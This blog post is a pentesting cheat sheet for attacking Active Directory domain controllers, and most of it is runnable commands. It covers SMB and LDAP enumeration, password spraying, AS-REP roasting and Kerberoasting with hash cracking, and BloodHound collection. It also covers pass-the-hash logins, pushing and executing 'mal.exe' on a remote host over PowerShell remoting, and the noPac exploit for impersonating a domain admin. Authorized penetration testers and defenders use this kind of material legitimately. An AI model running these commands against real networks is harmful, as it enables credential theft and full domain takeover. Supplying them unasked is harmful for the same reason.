In this blog post, we will share with you a comprehensive cheatsheet for pentesting those powerful and critical domain controllers. Now, I know what you're thinking: "But why, oh wise one, do we need such a guide?" Well, let me tell you, domain controllers are the repositories of your organization's most sensitive information - user credentials, group policies, and what not. And if not secured properly, they can lead to catastrophic data breaches or even system takeovers!
So buckle up, as we explore various techniques, tools for testing the security of domain controllers. From identifying potential vulnerabilities to exploiting them, we've got you covered with practical examples, real-life scenarios, and actionable insights. So stay tuned and prepare yourself for a rollercoaster ride through the fascinating world of pentesting!
Note: Before proceeding with pentesting any system, it is essential to have proper authorization from concerned authorities and follow ethical guidelines. Happy learning!
This is just a brief/quick guide on what and how to Pentest a domain controller without digging too deep. if you are looking for a comprehensive guide, you can refer to my ACTIVE DIRECTORY PENETRATION TESTING CHEAT SHEET - RECON & INITIAL ACCESS & ACTIVE DIRECTORY PENTEST CHEAT SHEET - LATERAL MOVEMENT & PERSISTENCE TECHNIQUES
DNS
dig srv domaim.com @DC_IP #Query ldap service dig +short srv _ldap._tcp.dc._msdcs.dc.domain.com @DC_IP #query Root Domain Controller dig +short a rootdc.domain.com @DC_IP
SMB Shares Enumeration # List shares smbclient -L //10.10.10.10/ #List Shares via Null Authentication smbclient -N -L //10.10.10.10/ #Access the contents of the share smbclient \\\\10.10.10.10\\share$ #List files inside a shares smbclient //friendzone.htb/general -U "" #Download a file get filename.txt #Once you are inside SMB interactive session - to download all files mget * #Once you are inside SMB interactive session - top upload a file put filename #Using Kerberos ticket with Smbclient smbclient -k -L //10.10.10.10/ #Shell using smb with creds psexec.py administrator@10.10.10.10 #Login using SMB MAP smbmap -u Administrator -p 'Password@1' -H 10.10.10.10
Download All the files Recursively from a Share:
smbclient '\\IP_ADDRESS\Share' -N -c 'prompt OFF;recurse ON;mget *'
or
smbclient '\\server\share'
mask ""
recurse ON
prompt OFF
cd 'path\to\remote\dir' //Can Skip
lcd '~/path/to/download/to/' //Can Skip
mget *LDAP Enum
#Nmap Scan for basic info nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10 #Get Domain name ldapsearch -x -h 10.10.10.10 -s base namingcontexts ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts #Look for misconfigs - Finding ms-MCS-AdmPwd ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd #Dump Everything ldapsearch -LLL -x -H ldap://DOMAIN.FQDN.COM -b "DC=domain,DC=fqdn,DC=com" "(objectClass=*)" #Dump Everything using ldeep ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump
UserEnum
Objective is to gather as many valid usernames as possible, try to figure out the username format used by the organization using their email addresses or social engineering Example Name: John Smith Usernames: John.Smith, JohnS, Sjohn, SmithJ, JSmith, John.s try to figure it out and create a wordlist for yourself, you can use the below git reopo as a reference and create a list of usernames git clone https://github.com/Bhanunamikaze/Wordlists.git cd Wordlists/Usernames # User Enumeration to find Valid Usernames kerbrute userenum --dc 10.10.10.10 -d test.domain.com Common_names.txt #Password Spray with a known password kerbrute --dc domain.local -d domain.local -v passwordspray usernames.txt 'Kn0wnPaSSW0rd!'
Finding Users Using Netexec
#use Netexec to find users - Brute force RID ; #Collect the usernames - either brute force for passwords or look for Pre-Auth users nxc smb 10.10.10.10 -u 'Guest' -p '' --rid-brute nxc smb 10.10.10.10 -u 'anonymous' -p '' --rid-brute > output.txt crackmapexec smb domain.local -u "user" -p "pass" --rid-brute | grep SidTypeUser #Grep for usernames cat output.txt| grep "SidTypeUser" | cut -d "\\" -f2 | cut -d " " -f1 > user.txt #Brute force Usernames with a known password nxc smb 10.10.10.10 -u users.txt -p 'P@SSW)rd!' #Brute force with known username nx smb 10.10.10.10 -u 'UserNameHere' -p passwords.txt #List Users nxc smb 10.10.10.10 -u 'Username' -p 'P@ssw0rd!' --users #Create Bloodhound Collection netexec ldap 10.10.10.10 -u username@domain.local --use-kcache --bloodhound --collection All --dns-server 10.10.10.10 netexec ldap 10.10.10.10 -u username@domain.local -p 'P@ssw0rd!' --bloodhound --collection All --dns-server 10.10.10.10
User Enum using TGT #Request a TGT impacket-getTGT domain.local/USERName:'P@SSW)RD1' -dc-ip 10.10.10.10 #add the TGT PATH to Env Variables export KRB5CCNAME=$(pwd)/USERName.ccache #RID Brute - use DC Address here as it tries to find the realm netexec smb dc01.domain.local -u Username -k --use-kcache --rid-brute #Grep Users and save it to users.txt netexec smb dc01.domain.local -u Username -k --use-kcache --rid-brute | grep "SidTypeUser" | cut -d "\\" -f2 | cut -d " " -f1 > users.txt #Create Bloodhound Collection netexec ldap 10.10.10.10 -u username@domain.local --use-kcache --bloodhound --collection All --dns-server 10.10.10.10
Find Pre-Auth Disabled Users
GetNPUsers.py DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.10 #AD Module - Finding users with PreauthNotRequired set Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth #Copy the hash and crack it using John john krbhash --wordlist=wordlist.txt #Cracking using Hashcat; add $23 after $krb5asrep if you do not export the hash as hashcat format hashcat -m 18200 hash -a 3 rockyou.txt hashcat -m 18200 hash rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force
Run Powershell AD Commands with Credentials
$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('Domain\UserName', $SecPassword) Get-aduser -Identity user1 -Credential $Cred Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth -Server 10.10.10.10 -Credential $Cred
Kerberoasting
#Listing users with ServicePrincialName set using AD module Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #Get TGS Ticket Using GetUserSPNs.py sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark
Running Bloodhound on Linux #Match the Time with Doamin controller. sudo apt-get install ntpdate sudo ntpdate <DC IP> #Add required DNS to /etc/hosts if there is no direct DNS #Once you have creds for any user -run blood hound to look for priv esc git clone https://github.com/dirkjanm/BloodHound.py pip install bloodhound-python -u UserName -p "P@SSW)RD!" -d steins.local -ns 10.10.10.10 -c All or Another way is to run using NETEXEC #Request a TGT impacket-getTGT domain.local/USERName:'P@SSW)RD1' -dc-ip 10.10.10.10 #add the TGT PATH to Env Variables export KRB5CCNAME=$(pwd)/USERName.ccache #Create Bloodhound Collection netexec ldap 10.10.10.10 -u username@domain.local --use-kcache --bloodhound --collection All --dns-server 10.10.10.10 netexec ldap 10.10.10.10 -u username@domain.local -p 'P@ssw0rd!' --bloodhound --collection All --dns-server 10.10.10.10
Logging With Creds
1. dir \\hostname.domain.local\c$
2. psexec \\hostname.domain.local cmd.exe
3. $sess = New-PSSession -ComputerName server.steins.local
Copy-Item -Path C:\Temp\mal.exe -Destination 'C:\mal.exe' -ToSession $sess
Invoke-Command -ScriptBlock {cmd /c C:\mal.exe } -Session $sess
4. cd cd \\server.steins.local\c$
5. psexec.py noobs@10.10.10.10
#login with hash
6. evil-winrm -i 10.10.10.10 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
7. wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 steins.local/administrator@10.10.10.10
8. smbexec.py administrator@10.10.10.10
9.Login with Kerberos Token
impacket-getTGT domain.local/USERName:'P@SSW)RD1' -dc-ip 10.10.10.10
export KRB5CCNAME=$(pwd)/USERName.ccache
evil-winrm -i dc01.domain.local -r domain.local
SMB/rpc Access
Use this script for testing SMB & RPC, this will run most common test cases on SMB rpcdump.py 10.10.10.10 -p 593#RPC Endpoints enum via metsploit msfconsole use auxiliary/scanner/smb/pipe_auditor use auxiliary/scanner/smb/smb_lookupsid use auxiliary/scanner/dcerpc/endpoint_mapper use auxiliary/scanner/dcerpc/hidden use auxiliary/scanner/dcerpc/management use auxiliary/scanner/dcerpc/tcp_dcerpc_auditorset rhosts 10.10.10.10 run
SMB Bruteforcing
#Basic SMB & OS info crackmapexec smb 10.10.10.10 #List Shares crackmapexec smb 10.10.10.10 --shares #passing blank creds via smb crackmapexec smb 10.10.10.10 --shares -u '' -p '' #Check Guest access crackmapexec smb 10.10.10.10 -u guest -p '' #Listing users using Rid-brute crackmapexec smb 10.10.10.10 -u guest -p '' --rid-brute #If the password needs to be changed smbpasswd -U username -r 10.10.10.10 #Brute forcing SMB Creds crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt #Bruteforcing SMB using hashes proxychains crackmapexec -t 15 smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success
Check for CVE's
#Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
git clone https://github.com/Ridter/noPac.git
python3 noPac.py domain.local/User1:P@ssw0rd1 -shell -use-ldap -dc-ip 10.10.10.10
No comments:
Post a Comment